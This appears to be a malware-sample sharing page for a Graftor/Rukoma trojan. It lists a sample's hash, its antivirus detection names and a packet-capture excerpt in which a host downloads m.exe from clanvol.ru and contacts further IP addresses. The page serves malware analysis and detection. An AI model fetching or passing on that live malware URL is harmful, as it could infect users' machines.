Graftor/Rukoma Malware Crimeware Traffic Analysis PCAP file download Sample

Download Attachments

  • 1 pcap m
    Date added: May 21, 2017 8:56 pm | Added by: admin | File size: 64 KB | Downloads: 40
SHA256: d6142a44c2c8ea8c08c3ff346a7c4a6054bdcc5e39fa48c87ab1a300101da746
File name: m.exe
Detection ratio: 34 / 61
Analysis date: 2017-05-21 20:54:16 UTC
Antivirus                Result                              Update
Ad-Aware                 Gen:Variant.Graftor.371906          20170521
AhnLab-V3                Trojan/Win32.SelfDel.C1962528       20170521
ALYac                    Gen:Variant.Graftor.371906          20170520
Antiy-AVL                Trojan/Win32.SelfDel                20170521
Arcabit                  Trojan.Graftor.D5ACC2               20170521
Avast                    Win32:Adware-gen [Adw]              20170521
Avira (no cloud)         ADWARE/RuKoma.dtesq                 20170521
AVware                   Trojan.Win32.Generic!BT             20170521
BitDefender              Gen:Variant.Graftor.371906          20170521
Comodo                   TrojWare.Win32.AdWare.RuKoma.gedai  20170521
CrowdStrike Falcon (ML)  malicious_confidence_67% (D)        20170130
Cyren                    W32/Trojan.IDYE-0652                20170521
DrWeb                    Trojan.Siggen7.22031                20170521
Emsisoft                 Gen:Variant.Graftor.371906 (B)      20170521
ESET-NOD32               a variant of Win32/Adware.RuKoma.F  20170521

2017-05-21 15:55:35.969425 IP 192.168.1.102.55371 > 81.171.10.45.80: Flags [P.], seq 0:391, ack 1, win 256, length 391: HTTP: GET /m/m.exe HTTP/1.1
GET /m/m.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: clanvol.ru
Connection: Keep-Alive

2017-05-21 15:56:19.037302 IP 192.168.1.102.55360 > 185.165.29.36.80: Flags [.], ack 194926600, win 0, length 0
2017-05-21 15:58:19.201163 IP 192.168.1.102.55360 > 185.165.29.36.80: Flags [.], ack 1, win 0, length 0
